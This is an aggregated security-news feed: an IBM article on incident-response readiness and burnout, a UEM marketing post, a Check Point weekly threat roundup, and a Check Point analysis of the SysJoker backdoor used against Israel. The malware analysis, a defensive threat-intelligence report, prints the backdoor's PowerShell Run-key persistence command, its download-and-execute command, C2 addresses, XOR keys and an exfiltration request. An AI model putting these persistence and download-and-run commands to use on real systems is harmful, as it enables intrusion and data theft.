What cybersecurity pros can learn from first responders

Though they may initially seem very different, there are some compelling similarities between cybersecurity professionals and traditional first responders like police and EMTs. After all, in a world where a cyberattack on critical infrastructure could cause untold damage and harm, cyber responders must be ready for anything.

But are they actually prepared? Compared to the readiness of traditional first responders, how do cybersecurity professionals in incident response stand up? Let’s dig deeper into whether the same sense of urgency exists in cyber and what security leaders can learn from first responders.

What first responders and cyber IR professionals have in common

Troy Bettencourt, Global Head of X-Force Incident Response at IBM, has responder experience at multiple levels, with a background including military, law enforcement and cybersecurity incident response. According to Bettencourt, there are many parallels between military, law enforcement and cybersecurity incident responders.

“A lot of the things that make military and law enforcement successful — or help contribute to their success — is constant training and drilling,” he said. “When you have an emergency incident, if you’re part of an internal team and something happens, you don’t have to expend a lot of mental energy on the tasks that should be routine.”

To be successful, much like the military and first responders, incident responders in the cyber industry must have clearly defined roles and real-world experience. For example, they shouldn’t have to think about how to do a search in their EDR platform or how to query firewall logs or a SIEM.

“That should be practiced all the time,” Bettencourt said. “If you’re training and drilling that all the time, then you’re not consuming your limited mental energy and creating high stress, and you’re reserving the mental energy for the actual valuable tasks.”

For Bettencourt and the X-Force team, standardization is also key. “We want to make sure we’re approaching our analysis in the same way, so that if you have 50 systems to analyze and you spread that workload, you know that the findings can be trusted, but they’re also complete and that items weren’t missed,” he said.

Challenges for the cyber industry

One of the more tangible challenges for incident response (IR) is an overall commitment to cyber readiness. Unlike first responders, who have developed a high level of preparedness in their protocols, cyber still lags behind.

“There is still quite a ways to go,” said Bettencourt.

He acknowledged that while much of X-Force’s work skews toward large, more mature enterprise clients, some in certain sectors are still less mature. Small to medium-sized businesses and even larger enterprise organizations that don’t have the resources to invest in cybersecurity often lack the readiness for IR processes.

“Hopefully, it’s not viewed as an obstruction. The business has to adopt cybersecurity as part of the business and not as just a regulatory component that has to be complied with. Because the barrier to entry for cyber criminals has greatly diminished. It’s so easy to jump on the Dark Web and start getting tools and buying malicious Software-as-a-Service kits. It doesn’t take much to be a cyber criminal.”

But lurking in the shadows of the tangible challenges lies an intangible obstacle: responder burnout and stress. According to Bettencourt, studies have shown that, whether it’s cybersecurity, law enforcement, military or high-risk jobs, people often go over and above and beyond because of their team.

“They don’t want to let the team and their team members down,” he said.

With that responsibility, many IR professionals are often self-sacrificing and don’t look out for their own well-being. This can lead to significant burnout and stress.

“Now you have diminishing returns. You have talent retention issues, not just for the company, but for the field in general.”

Adopting the right mindset for IR success

To address the readiness challenges and keep pace with first responders, Bettencourt suggests the enterprise focus on three key areas.

Adaptability

While heavy standardization has its advantages, Bettencourt advises that organizations remain flexible. Especially in a field where technology and threat approaches are constantly changing and there is a constant desire to learn.

“Getting set in your ways in this field is a death knell from a career perspective because it’ll rapidly move past you,” he said. “I left the field for about three years, and it was like drinking from a fire hose when I got back — and I had been doing it for about six years before that.”

Encourage smaller teams

Building a small team culture has produced favorable results for the X-Force team.

“It’s an approach that benefits both the individual and the organization,” he said. “I think leaders really need to try to foster that structure, that culture of small teams where you can rely on each other, and by extension, people will go above and beyond because of their teammates. They don’t want to let their team down, which means they don’t want to let the business or clients down.”

Prioritize mental health

While mental health assistance is readily available in the cyber industry, it’s not discussed enough compared to first responders, where accessing such resources has become more normalized over time.

When it comes to trauma in first response jobs compared to IR and cybersecurity, Bettencourt noted that while there may not be as much physical trauma for cyber, the constant stress of working can build up over time and cause strain.

“Being an individual contributor burned me out,” he admitted. “At one point it was four months straight of 60 and 70-hour weeks. All I worked was ransomware and nation-state engagements, and it became too much for me and my family.”

Preventing burnout improves IR

Long hours are, unfortunately, very common in the field. So how can leadership develop the right mindset to reduce burnout?

“If you’re a business that just cares about the bottom line [and not your personnel], keeping responders happy is going to result in better performance and less attrition, which means less talent acquisition costs. In cyber, it still takes time to bring them up to speed. For IR, generally, if you lose somebody, it’s about six months before you get a replacement that can really contribute, which then means you’re burning your other folks out,” Bettencourt said.

“So from a purely business, mercenary perspective, even if your organization is not employee-focused, it makes sense from the standpoint of performance, client satisfaction, delivering quality outcomes — from the standpoint of nurturing talent, maintaining talent, reducing talent acquisition and retention costs. To me, it’s a no-brainer. You have happier people, and when people are happy, they will typically work harder for you.”

By learning some lessons from first responders, organizations can be ready to face whatever the next cyber crisis brings.

To learn how IBM X-Force can help you with anything regarding cybersecurity including incident response, threat intelligence or offensive security services schedule a meeting here.

If you are experiencing cybersecurity issues or an incident, contact X-Force to help: US hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034.

The post What cybersecurity pros can learn from first responders appeared first on Security Intelligence.

Security Intelligence – ​Read More

Unified endpoint management for purpose-based devices

As purpose-built devices become increasingly common, the challenges associated with their unique management and security needs are becoming clear.

What are purpose-built devices? Most fall under the category of rugged IoT devices typically used outside of an office environment and which often run on a different operating system than typical office devices. Examples include ruggedized tablets and smartphones, handheld scanners and kiosks.

Many different industries are utilizing purpose-built devices, including travel and transportation, retail, warehouse and distribution, manufacturing (including automotive) and healthcare. These devices, often running on Android Open Source Project (AOSP) and non-GMS (non-Google Mobile Services) platforms, are tailored to specific tasks and environments and can enhance productivity and streamline operations. However, managing and supporting these devices can pose a unique set of difficulties.

For the enterprise, investing in applications to manage these devices may seem like the only viable option. However, with the rapid advancements in Unified Endpoint Management (UEM) solutions, organizations can effectively manage and protect purpose-built devices without purchasing a separate, specialized app.

How can a modern UEM app seamlessly integrate and support purpose-built devices across various industries?

The power of a modern UEM app: Key benefits

A UEM solution is a comprehensive platform designed to manage and secure all types of devices. This includes smartphones, tablets, laptops and IoT devices, regardless of their operating system. UEM apps have evolved to support purpose-built devices and can be managed and protected just as efficiently as traditional devices.

Leveraging a wide range of powerful features and capabilities, organizations can address the unique challenges that purpose-built devices pose while streamlining their management processes.

Reduced costs are the most obvious benefit of a UEM app. However, businesses can also take advantage of these ten key benefits and functionalities.

Comprehensive device support: UEM apps support a wide variety of devices and operating systems, including Android Open Source Project (AOSP) and non-GMS platforms. This helps eliminate the need for additional specialized apps.

Customizable profiles and policies: A UEM app allows IT administrators to create custom profiles and policies tailored to specific device types and use cases, enabling them to fine-tune device configurations, security settings and access controls.

Enhanced security: Purpose-built devices often hold sensitive data and are used in critical operations. A UEM app enables IT administrators to implement robust security measures, such as encryption, secure data storage and advanced authentication, to protect from potential threats.

Device compliance: A modern UEM app can help ensure purpose-built devices adhere to industry-specific regulations. By automating device configuration and policy enforcement, a UEM app minimizes the risk of non-compliance and associated penalties.

Simplified updates and maintenance: A UEM app can automate software updates, patches and maintenance tasks for purpose-built devices. This ensures they remain up-to-date and secure — reducing downtime and maximizing device efficiency.

Reduced costs: By consolidating device management into a single UEM app, organizations can eliminate the need for multiple specialized apps, resulting in a lower total cost of ownership (TCO).

Remote monitoring and troubleshooting: Modern UEM apps provide IT administrators with real-time visibility into the status and performance of purpose-built devices, including monitoring device health, network connectivity and battery life. UEM apps can also enable remote troubleshooting and diagnostics.

App management and distribution: A UEM app simplifies the process of deploying, updating and managing apps on purpose-built devices. IT administrators can centrally manage app catalogs, so devices have access to the latest versions of critical apps. IT teams can remotely install, update or remove apps on devices to streamline app management across the organization.

Context-aware management: By incorporating context-aware capabilities, UEM apps allow IT administrators to apply policies and configurations based on factors such as device location, network connectivity or user roles.

Scalability and future-proofing: A UEM app can scale and adapt to the evolving needs of an organization. As businesses grow and adopt new purpose-built devices, a UEM app can easily expand its support to accommodate these devices.

Integration with other IT systems: Current UEM apps seamlessly integrate with other IT systems and platforms, such as enterprise mobility management (EMM) solutions, identity and access management (IAM) systems and IT service management (ITSM) tools.

What is UEM?

Which industries can benefit from UEM apps?

A modern UEM app can support purpose-built devices across a diverse set of industries. Here are the most common:

Travel and transportation: Purpose-built devices here often include ticketing machines, fleet management devices and navigation systems. A UEM app manages these devices efficiently, keeping them updated and protected from security threats.

Retail: Retailers rely on devices such as point-of-sale (POS) systems, inventory scanners and digital signage. A UEM app can manage these devices, secure payment transactions and streamline device deployment and updates.

Warehouse and distribution: Purpose-built devices such as barcode scanners, inventory management systems and forklift-mounted tablets are essential in a warehouse environment.

Manufacturing (including automotive): Manufacturers use purpose-built devices for quality control, production line automation and inventory management. Like in warehouse and distribution, a UEM app can help manage these devices, ensure they comply with industry standards and protect sensitive data.

Healthcare: Healthcare providers use purpose-built devices such as patient monitoring systems, medical imaging equipment and electronic health record (EHR) systems. A UEM app can help secure patient data, keep devices compliant with HIPAA and other regulations and simplify device management across the healthcare ecosystem.

How the enterprise can best leverage UEM

The increasing use of purpose-built devices across various industries requires a robust and flexible management solution. UEM apps have evolved to meet this challenge, providing a comprehensive platform that can effectively manage and protect purpose-built devices alongside traditional devices.

IBM commissioned Forrester Consulting to conduct a Total Economic Impact™ study to help IT and security leaders realize, demonstrate and justify the tangible value of their investment in unified endpoint management.

This study applied Forrester’s TEI methodology to examine the potential return on investment enterprises may capture by deploying IBM MaaS360 with Watson UEM.

Forrester interviewed and surveyed several customers with years of experience using MaaS360 to help key decision-makers identify the cost, benefit, flexibility and risk factors that affect their UEM investment decision.

Conclusion

By adopting a UEM app, organizations can centralize device management, enhance security, ensure compliance, streamline updates and maintenance and reduce costs. This allows businesses to fully leverage the benefits of purpose-built devices without the need for additional specialized applications.

Ultimately, that increased operational efficiency can give your organization the competitive advantage it needs.

The post Unified endpoint management for purpose-based devices appeared first on Security Intelligence.

Security Intelligence – ​Read More

27th November – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 27th November, please download our Threat_Intelligence Bulletin.

TOP ATTACKS AND BREACHES

Nevada-based medical transcription company, Perry Johnson & Associates (PJ&A), has disclosed a data breach that affected more than 9M patients at multiple healthcare providers in the US. The exposed data includes patients’ names, addresses, dates of birth, Social Security Numbers, and medical records. The attack is considered as one of the most severe medical data breaches in recent years.
The British Library, one of the largest libraries in the world, suffered a ransomware attack that resulted in the exposure of internal human resources data. Rhysida ransomware gang has claimed responsibility, setting a starting price of 20 bitcoins (approximately $750K) as a ransom with seven days deadline.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Ransomware.Win.Rhysida; Ransomware.Wins.Rhysida)

A cyberattack on Vanderbilt University Medical Center (VUMC), which operates seven hospitals and numerous healthcare facilities across Nashville, Tennessee, has resulted in a data breach. Meow ransomware gang has claimed responsibility for the attack.
A sophisticated cyberattack on CTS, a UK-based managed service provider (MSP), has disrupted services for hundreds of law firms. The attack blocked access of hundreds of British law firms from their case management systems, causing delays in legal proceedings and disrupting communication between clients and lawyers. CTS is working to restore services, but no timeline has been given.
Ransomware group AlphV/BlackCat has assumed responsibility for the cyber-attack on the American real estate insurance giant Fidelity National Financial (FNF), a Fortune 500 company, resulting in the shutdown of its network.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.BlackCat, Ransomware_Linux_BlackCat, Ransomware_Linux_BlackCat)

The Idaho National Laboratory (INL), a US-based nuclear research center, has confirmed a data breach that resulted in the exposure of internal human resources data. Hacktivists group SiegedSec took responsibility for the attack, claiming to have stolen the personal information of hundreds of thousands of employees, users, and citizens. The allegedly leaked data includes full names, dates of birth, email addresses, phone numbers, Social Security Numbers, addresses and employment info.

VULNERABILITIES AND PATCHES

Sucuri has released its WordPress Vulnerability & Patch Roundup November 2023. Among the vulnerabilities is the high-severity Elementor Website Builder Stored Cross-Site Scripting flaw (CVE-2023-47505), nine additional medium-severity flaws including WooCommerce Checkout Manager Missing Authorization flaw (CVE-2023-47681), and other low-severity flaws.
The open-source file-sharing software ownCloud has warned of three critical security vulnerabilities, including a flaw in containerized deployments for certain graphapi versions, a WebDAV Api Authentication Bypass using Pre-Signed URLs affecting core versions, and a Subdomain Validation Bypass in oauth2. These flaws could be exploited to expose confidential data and manipulate files.
Mozilla has released security patches for Firefox and Thunderbird, which address multiple high severity vulnerabilities. Some of the vulnerabilities potentially allowed remote code execution if exploited.

THREAT INTELLIGENCE REPORTS

Check Point Research provides a case study of some of the most recent ransomware attacks targeting Linux systems and ESXi systems, which have been increasing over the last few years. The study, encompassing 12 prominent ransomware families, investigates the motivations behind developing ransomware for Linux and reveals that many Linux-targeting families heavily utilize the OpenSSL library along with ChaCha20/RSA and AES/RSA algorithms.
Check Point Research shares insights from their active tracking of the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we asses was utilized by a Hamas-affiliated APT to target Israel. Notably, the tool went through prominent changes including the shift to Rust language and a move to using OneDrive instead of Google Drive to store dynamic C2 URLs.

Check Point Harmony Endpoint, Threat Emulation and Anti-Bot provide protection against this threat (Backdoor.Wins.Sysjoker.ta, Backdoor_Linux_SysJoker, Backdoor.Win.SysJoker, Backdoor.WIN32.SysJoker)

Check Point Research, using Threat Intel Blockchain system, uncovered an ongoing sophisticated Rug Pull scheme that managed to pilfer nearly $1M. The actor behind this scheme was traced, unveiling the perpetrator lured unsuspecting victims into investing using the crowd’s hype around ill-gotten gains.

CISA has published a #StopRansomware report on LockBit 3.0 ransomware operation. The report is based, among others, on information shared by Boeing, which had been affected by the group recently.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Lockbit; Gen.Win.Crypter.Lockbit; Ransomware.Wins.LockBit.ta; Ransomware_Linux_Lockbit)

The post 27th November – Threat Intelligence Report appeared first on Check Point Research.

Check Point Research – ​Read More

Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker

Key Findings

Check Point Research is actively tracking the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we asses was utilized by a Hamas-affiliated APT to target Israel.

Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten, while still maintaining similar functionalities. In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command and control server) URLs.

Analysis of newly discovered variants of SysJoker revealed ties to previously undisclosed samples of Operation Electric Powder, a set of targeted attacks against Israeli organizations between 2016-2017 that were loosely linked to the threat actor known as Gaza Cybergang.

Introduction

Amid tensions in the ongoing Israel-Hamas war, Check Point Research has been conducting active threat hunting in an effort to discover, attribute, and mitigate relevant regional threats. Among those, some new variants of the SysJoker malware, including one coded in Rust, recently caught our attention. Our assessment is that these were used in targeted attacks by a Hamas-related threat actor.

SysJoker, initially discovered by Intezer in 2021, is a multi-platform backdoor with multiple variants for Windows, Linux and Mac. The same malware was also analyzed in another report a few months after the original publication. Since then, SysJoker Windows variants have evolved enough to stay under the radar.

As we investigated the newer variants of SysJoker that were utilized in targeted attacks in 2023, we also discovered a variant written in Rust, which suggests the malware code was completely rewritten. In addition, we also uncovered behavioral similarities with another campaign named Operation Electric Powder which targeted Israel in 2016-2017. This campaign was previously linked to Gaza Cybergang (aka Molerats), a threat actor operating in conjunction with Palestinian interests.

In this article, we drill down into the Rust version of SysJoker, as well as disclose additional information on other SysJoker Windows variants and their attribution.

Rust SysJoker Variant

The SysJoker variant (9416d7dc2ecdeda92ba35cd5e54eb044), written in Rust, was submitted to VirusTotal with the name php-cgi.exe on October 12, 2023. Compiled a few months earlier on August 7, it contains the following PDB path: C:CodeRustRustDown-BelaltargetreleasedepsRustDown.pdb.

The malware employs random sleep intervals at various stages of its execution, which may serve as possible anti-sandbox or anti-analysis measures.

The sample has two modes of operation which are determined by its presence in a particular path. This is intended to differentiate the first execution from any subsequent ones based on persistence.

First, it checks whether the current running module matches the path C:ProgramDataphp-7.4.19-Win32-vc15-x64php-cgi.exe. Based on the outcome the malware proceeds to one of the two possible stages.

First execution

If the sample runs from a different location, indicating it’s the first time the sample is executed, the malware copies itself to the path C:ProgramDataphp-7.4.19-Win32-vc15-x64php-cgi.exe and then runs itself from the newly created path using PowerShell with the following parameter:

-Command C:ProgramDataphp-7.4.19-Win32-vc15-x64php-cgi.exe

Finally, it creates a persistence mechanism and then exits the program.

Persistence is established in an unusual way, using PowerShell with the following argument:

-Command “$reg=[WMIClass]’ROOTDEFAULT:StdRegProv’;
$results=$reg.SetStringValue(‘&H80000001′,’SoftwareMicrosoftWindowsCurrentVersionRun’, ‘php-cgi’, ‘C:ProgramDataphp-7.4.19-Win32-vc15-x64php-cgi.exe’);”

Eventually, this PowerShell code creates a registry Run key in the HKEY_CURRENT_USER hive, which points to the copy of the executable, using the WMI StdRegPro class instead of directly accessing the registry via the Windows API or reg.exe.

Subsequent executions (from persistence)

SysJoker contacts a URL on OneDrive to retrieve the C2 server address. The URL is hardcoded and encrypted inside the binary:

https://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112&authkey=!AED7TeCJaC7JNVQ

The response must should contain also a XOR-encrypted blob of data that is encoded in base64. During our investigation, the following response was received:

KnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr

After decryption, the C2 IP address and port are revealed:

{“url”:”http://85.31.231[.]49:443″}

Using OneDrive allows the attackers to easily change the C2 address, which enables them to stay ahead of different reputation-based services. This behavior remains consistent across different versions of SysJoker.

The malware collects information about the infected system, including the Windows version, username, MAC address, and various other data. This information is then sent to the /api/attach API endpoint on the C2 server, and in response it receives a unique token that serves as an identifier when the malware communicates with the C2:

Figure 1 – Bot registration api call.

After registration with the C2 server, the sample runs the main C2 loop. It sends a POST request containing the unique token to the /api/req endpoint, and the C2 responds with JSON data:

Figure 2 – Command request and response.

The expected response from the server is a JSON that contains a field named data that contains an array of actions for the sample to execute. Each array consists of id and request fields. The request field is another JSON with fields called url and name. An example of the response from the server:

{“data”:[{“id”:”1″, “request”:”{“url”: “http://85.31.231[.]49/archive_path”, “name”:”mal_1.exe”}”}, {“id”:”2″, “request”:”{“url”: “http://85.31.231[.]49/archive_path”, “name”:”mal_2.exe”}”}]}

The malware downloads a zip archive from the URL specified in the url field. The archive contains an executable that after unzipping is saved as the name field into C:ProgramDataphp-Win32-libs folder. The archive is unzipped using the following PowerShell command:

powershell -Command Expand-Archive -Path C:ProgramDataphp-Win32-libsXMfmF.zip -DestinationPath C:ProgramDataphp-Win32-libs ; start C:ProgramDataphp-Win32-libsexe_name.exe

It is important to mention that in previous SysJoker operations, the malware also had the ability not only to download and execute remote files from an archive but also to execute commands dictated by the operators. This functionality is missing in the Rust version. After receiving and executing the file download command, depending on whether the operation was successful or not, the malware contacts the C2 server again and send a success or exception message to the path /api/req/res. The server sends back a JSON confirmation indicating that it has received the information: {“status”:”success”}.

Encryption

The malware has two methods for string decryption. The first method is simple and appears across multiple SysJoker variants. The sample contains several base64-encoded encrypted data blobs and a base64-encoded key. Upon decryption, both blobs are base64-decoded and then XORed to produce the plain text strings.

The second encryption method is tedious and is spliced in-line throughout the program repeatedly at compile time. This generates a complex string decryption algorithm throughout the sample.

Figure 3 – Example of the decryption of the string “php-”.

Windows SysJoker Variants

In addition to the newly found Rust variant, we uncovered two more SysJoker samples that were not publicly exposed in the past. Both of these samples are slightly more complex than the Rust version or any of the previously analyzed samples, possibly due to the public discovery and analysis of the malware. One of these samples, in contrast to other versions, has a multi-stage execution flow, consisting of a downloader, an installer, and a separate payload DLL.

DMADevice variant

The DMADevice sample (d51e617fe1c1962801ad5332163717bb) was compiled in May 2022, a few months after SysJoker was first uncovered.

Like other versions, the malware starts by retrieving the C2 server address by contacting the URL: 

https://onedrive.live[.]com/download?cid=F6A7DCE38A4B8570&resid=F6A7DCE38A4B8570!115&authkey=AKcf8zLcDneJZHw

The OneDrive link responds with an encrypted base64-encoded string, which is decrypted with the XOR key QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT. This is the same key that is used in the Rust version.

The decrypted blob contains a JSON with the C2 domain in the following format:

{“url”:”http://sharing-u-file[.]com”}

Next, the malware proceeds to the three-stage execution process.

1. Setup files and persistence

The sample generates a unique bot ID, sends it in a POST request to the /api/cc API endpoint, and receives back the JSON describing the desired malware setup on the infected machine.

The JSON has the following structure:

{“key”:”f57d611b-0779-4125-a3e8-4f8ca3116509″,”pi”:”VwUD[REDACTED]”,”data”:”PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVRJZQU0RdXx3cVVPD1ZSRhoTdS9sY1hbTFldXlx8QwIRSRppeSdrDA1GRVhZW3lXBRtSHFMTHUBpfXZkVkFBRVtaQyhdBhZJWAoaT0NDXkZTR0NRA1lbSlNJVEABElRaXQ8YE11FSA8RSRpeQAdKF0MfE20ZVhBrI3IXJXJ1ESpmc2JrZX57d2ZibDN2OWRgXQVKDBJcV0VqaWdQCFFYE0VtbSFYQkVSV1liVEBGRA5dOWR/QQgYP05lEx0UaR9NRmdyI2lia0JxH3MVFQ8aVEpQD00RQV1DQlxNEARBX1BbUBBFRnpCEBt3WA5IEBpyV05bVVtbSkEUEExLDEEYREMfE2J5c2RuJ2dyOGp8WAFfX0RYX1lobWVcQwVcEktxaCVNERNWX0VgUEJKD1pZOGpjRAwPbQ==”}

The field key in the JSON is used to XOR-decrypt the other fields after they are base64-decoded: the pi field contains the victim’s IP address and the data field contains the array with multiple values:

[“SystemDrive”,”ProgramData”,”DMADevice”,”DMASolutionInc”,”DMASolutionInc.exe”,”DMASolutionInc.dll”,”powershell.exe”,”cmd”,”open”,”start”,”/c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V”,”/t REG_SZ /D”,”.exe”,”$env:username | Out-File -Encoding ‘utf8’ ‘”,”SOFTWARE\Microsoft\Windows\CurrentVersion\Run”]

Those values are utilized in the following order:

SystemDrive – Get the system hard drive letter.

ProgramData – Create these two folders under the specified (in this case, ProgramData) folder:
– DMADevice – The first folder name created.
– DMASolutionInc.exe – The file name used by the currently running executable to self-replicate into the DMADevice folder.

DMASolutionInc.dll – The name of the config file.

DMASolutionInc – The second folder name created.

The rest of the values are used in a few commands that establish persistence via the registry Run key and retrieve the current user name from $env into the temporary txt file.

The config file, in our case DMASolutionInc.dll, is stored on a disk encrypted (using the same key used to decrypt the domain) and base64-encoded. It contains encrypted JSON with the following fields:

{“id”:”[BOT-ID]”,”us”:”[USERNAME]”,”ip”:”[IP]”}

After performing all these operations, the sample executes its copy from DMASolutionInc.exe and exits.

2. Register with the C2 server

When the sample is executed again (via persistence from the previous stage), it checks the location it is running from. It then continues the execution by making a POST request to /api/add containing the uuid, user name, and user token, which is also generated by the malware:

uuid=bot-id&nu=username&user_token=token

The server responds with a token generated on its side which is then used for all the subsequent C2 requests.

3. C2 main loop

The token received during the previous stage is used for making POST requests to /api/cr on the C2 server to retrieve the commands to execute.

Similar to other SysJoker variants, the server responds with a JSON that contains field data which is an array of actions to take. This version can download and execute files or run commands and upload the results to the C2 server. For each command in the array, the sample sends a response reporting if it was successful or not.

AppMessagingRegistrar variant

This variant has a compilation timestamp of June 2022 and has a quite different execution flow. The functionality of the malware is divided into two separate components: a downloader (DDN, c2848b4e34b45e095bd8e764ca1a4fdd) and a backdoor (AppMessagingRegistrar, 31c2813c1fb1e42b85014b2fc3fe0666).

DDN Downloader

The threat actors first deliver a lightweight downloader. It creates the folder C:ProgramDataNuGet Library, then downloads a zip file from https://filestorage-short[.]org/drive/AppMessagingRegistrar.zip . It unzips the file, copies it into the AppMessagingRegistrar.exe file and then executes it.

Splitting the functionality into separate components has proved effective: at the time of the first submission to VirusTotal (VT), the malware was not detected by any of the platform’s engines:

Figure 4 – DNN downloader with 0 detections on its first submission to VT (2023-04-09).

AppMessagingRegistratar

Upon execution, this payload first checks the registry key SOFTWAREIntelUNPProgramUpdatesUUID for the UUID of the PC. If the registry key is not available, a UUID is generated using the UuidCreate function and is then saved to the previously mentioned key.

Figure 5 – Uuid Generation.

The variant then proceeds to decrypt a hardcoded OneDrive URL to retrieve a C2 address. The XOR key in this sample is 22GC18YH0N4RUE0BSJOAVW24624ULHIQGS4Y1BQQUZYTENJN2GBERQBFKF2W78H7.

After the C2 address is decrypted, a POST request is made to the C2 server API endpoint /api/register which contains the previously generated UUID.

The server responds with a JSON containing a token and a status message: 

{“status”: “success”, “token”:”[TOKEN]”, “status_num”:1}

The status indicates if the request was valid or not, and the samples check specifically for the string “success”. The token is used for all the following C2 requests but unlike all the other samples, instead of using the body of requests, it is sent in the Authorization header: Authorization: Bearer [TOKEN]. This change could be to accommodate additional flows in the malware execution (discussed below) in which the malware sends a GET request instead of a POST and requires a mechanism for the server to identify the sender.

The status_num field is used as a global flag to indicate what actions the bot should take. There are four statuses available:

Status NumberActionDescription0SetupDownload MsoftInit.dll and execute the init and step exports.1Idle loopWait for status_num to change.3Payload retrievalDownload and save MsoftNotify.dll DLL.4Payload executionExecute MsoftNotify.dll DLL.

Setup phase
If the received status_num is 0, the malware creates the C:ProgramDataIntelUNPProgramUpdates and C:ProgramDataIntelDriversMsoftUpdates folders. It then proceeds to:

Download a DLL file using the function UrlDownloadToFileW from the path /api/library/[TOKEN] and save it to C:ProgramDataIntelDriversMsoftUpdatesMsoftInit.dll.

Load the MsoftInit.dll and call the init exported function.

Load the same DLL again and call the step exported function.

The exact purpose of those functions is unknown as we were not able to retrieve the DLL. However, due to the names and our analysis of previous versions of the malware, we believe they were part of the persistence and setup process. Finally, the malware sends an empty POST request to the API endpoint /api/update. The expected response from the server is an empty JSON.

Idle loop
If the status_num is 1, the malware continues to make requests to the C2 API endpoint /api/status in an infinite loop. To break the loop, the status_num must change.

Main payload download
If the status_num is 3, the malware proceeds to download a DLL file from URL /api/library/[TOKEN] and saves it to the path C:ProgramDataIntelDriversMsoftUpdatesMsoftNotify.dll. It then sends a request to the C2 API endpoint /api/ready: if the server responds with a status success, the status flag is then set to 4.

Payload execution
If the status is 4, the malware proceeds to make a GET request to the C2 API endpoint /api/requests. The C2 server responds with a JSON with 3 parameters, id, r, and k.

The malware then loads the MsoftNotify.dll DLL and resolves the function st. The r and k values sent from the server are used by st as parameters. We were not able to retrieve the DLL, but based on the previous versions, this is likely a version of the main command running functionality for the backdoor, and its return value should be a string. After the function runs and returns a result, the id received in the token is used in the POST request to the C2 which contains the output:

POST /api/requests/[ID] HTTP/1.1
Host: [62.108.40.129](https://www.virustotal.com/gui/url/79fde5d4b19cbd1f920535215c558b6ff63973b7af7d6bd488e256821711e0b1)
Accept: application/json
Authorization: Bearer [TOKEN]
Content-Length: 15
Content-Type: application/x-www-form-urlencoded

response=[EXECUTION OUTPUT]

Infrastructure

The infrastructure used in this campaign is configured dynamically. First, the malware contacts a OneDrive address, and from there, it decrypts the JSON containing the C2 address with which to communicate. The C2 address is encrypted with a hardcoded XOR key and base64-encoded.

This threat actor commonly uses cloud storage services. Previous reports show Google Drive was used for the same purpose.

Figure 6 – Metadata of OneDrive file containing the encrypted C2 server.

Ties to Operation Electric Powder

The SysJoker backdoor uses its own custom encryption for three main strings: the OneDrive URL containing the final C2 address, the C2 address received from the request to OneDrive, and a PowerShell command used for persistence:

$reg=[WMIClass]’ROOTDEFAULT:StdRegProv’;
$results=$reg.SetStringValue(‘&H80000001’,’SoftwareMicrosoftWindowsCurrentVersionRun'[TRUNCATED]

This PowerShell command based on the StdRegProv WMI class is quite unique. It is shared between multiple variants of SysJoker and only appears to be shared with one other campaign, associated with Operation Electric Powder previously reported by ClearSky.

The 2017 report describes the persistent activity carried out in 2016-2017 against the Israel Electric Company (IEC). This operation used phishing and fake Facebook pages to deliver both Windows and Android malware. Windows malware used in this campaign consisted of a dropper, a main backdoor, and a Python-based keylogging and screen-grabbing module.

Throughout our analysis of the SysJoker operation, we saw indications suggesting that the same actor is responsible for both attacks, despite the large time gap between the operations. Both campaigns used API-themed URLs and implemented script commands in a similar fashion. This includes the Run registry value but is not the only common factor. For example, the following image shows the similarities between the commands used by different malware when gathering recon data from the infected device to temporary text files:

Figure 7 – Use of the type command in Electric Powder → the original SysJoker → DMADevice SysJoker variant.

Conclusion

Although the SysJoker malware, which was first seen in 2021 and publicly described in 2022, wasn’t attributed to any known actor, we found evidence that this tool and its newer variants have been used as part of the Israeli-Hamas conflict. We were also able to make a connection between SysJoker and the 2016-2017 Electric Powder Operation against Israel Electric Company.

In our report, we described the evolution of the malware and the changes in the complexity of its execution flow, as well as its latest shift to the Rust language and the latest infrastructure it uses.

The earlier versions of the malware were coded in C++. Since there is no straightforward method to port that code to Rust, it suggests that the malware underwent a complete rewrite and may potentially serve as a foundation for future changes and improvements.

Check Point Customers Remain Protected

Check Point Customers remain protected against attacks detailed in this report, while using Check Point Anti-Bot, Harmony Endpoint and Threat Emulation.

Threat Emulation
Backdoor.Wins.Sysjoker.ta.R
Backdoor.Wins.Sysjoker.ta.Q
Backdoor.Wins.Sysjoker.ta.P
Backdoor.Wins.Sysjoker.ta.O
Backdoor.Wins.Sysjoker.ta.N
Backdoor.Wins.Sysjoker.ta.M
Backdoor.Wins.Sysjoker.ta.L

Harmony Endpoint
Backdoor.Win.SysJoker.H

Check Point Anti-Bot
Backdoor.WIN32.SysJoker.A
Backdoor.WIN32.SysJoker.B
Backdoor.WIN32.SysJoker.C

IOCs

Infrastructure

85.31.231[.]49sharing-u-file[.]comfilestorage-short[.]orgaudiosound-visual[.]com62.108.40[.]129

Hashes

d4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e726c8471e8c37e0a3d608184147f89d81d62f9442541a04d15d9ead0b3e0862d95e076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e923983696dc31cf0f9e7e59b4e00627f9c7f7a8cac3b8f4338b27d713b0aaf6abacfe6f67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc7060ff6ff167c71b86c511c36cba8f75d1d5209710907a807667f97ce323df9c4ba

The post Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker appeared first on Check Point Research.

Check Point Research – ​Read More

How to update Android without bugs, data loss, security risks or other nuisances | Kaspersky official blog

